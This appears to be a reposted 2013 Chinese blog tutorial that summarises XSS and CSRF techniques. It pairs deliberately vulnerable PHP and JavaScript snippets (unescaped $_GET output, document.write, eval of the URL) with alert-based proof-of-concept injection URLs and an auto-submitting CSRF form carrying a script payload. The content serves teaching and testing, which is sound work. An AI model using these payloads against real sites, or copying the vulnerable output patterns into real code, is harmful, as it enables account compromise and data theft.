记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

xss与csrf自我技巧总结

2013-10-13 23:40
 \

     xss篇:

1,普通的反射型xss

<?php echo $_GET['XSS'];?>

POC:http://www.test.org/test.php?xss=<script>alert(1)</script>

2,xss反射


<?php
echo $_GET;
?>

POC:http://www.test.org/test.php?<script>alert(1)</script>

3,被引号包围的xss

<?php echo "<a href='$_GET['XSS']'>A</A>";?>

POC 1:http://www.test.org/test.php?xss="/><script>alert(1)</script><"

POC 2:http://www.test.org/test.php?xss=javascript:alert(1);

4,在某种情况下过滤了<>但是没有过滤引号

<?php echo "<img src="'$_GET['XSS']'"/>";?>

POC:http://www.test.org/test.php?xss=#"onerror=alert(11);//

5,dom反射

<script>document.write(location.href);</script>

poc:http://www.test.org/test.php#<img/src=# onerror=alert(1)>

火狐等浏览器无效
6,富文本绕过:<base>

<base> 标签为页面上的所有链接规定默认地址或默认目标。

如:<base href="http://www.test.org">

<a href="xss">x</a>href里的URL是http://www.test.org/xss

7,eval

<script>var url = window.location.href;

eval(url)</script>

poc:http://www.test.org/test.php#alert(String.fromCharCode(88, 83, 83))

 

从安全的角度讲所有的输出输入的都是有害的,javascript从的输出有:

document.write()

innerHTML=""

eval()

 

csrf篇

post伪造包提交poc:


<form action="http://www.test.com/test.shtml
" method="POST" name="csrf">

<input type="text" name="mobile" value="18265464645<img/src=# onerror=alert(1)>">

<input type="text" name="currTime" value="1380530205097">
<input type="text" name="city" value="">
<input type="text" name="isMini" value="5">

</form>
<script> document.csrf.submit()</script>

 

知识来源: www.2cto.com/Article/201310/249553.html

阅读:81071 | 评论:0 | 标签:xss CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“xss与csrf自我技巧总结”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云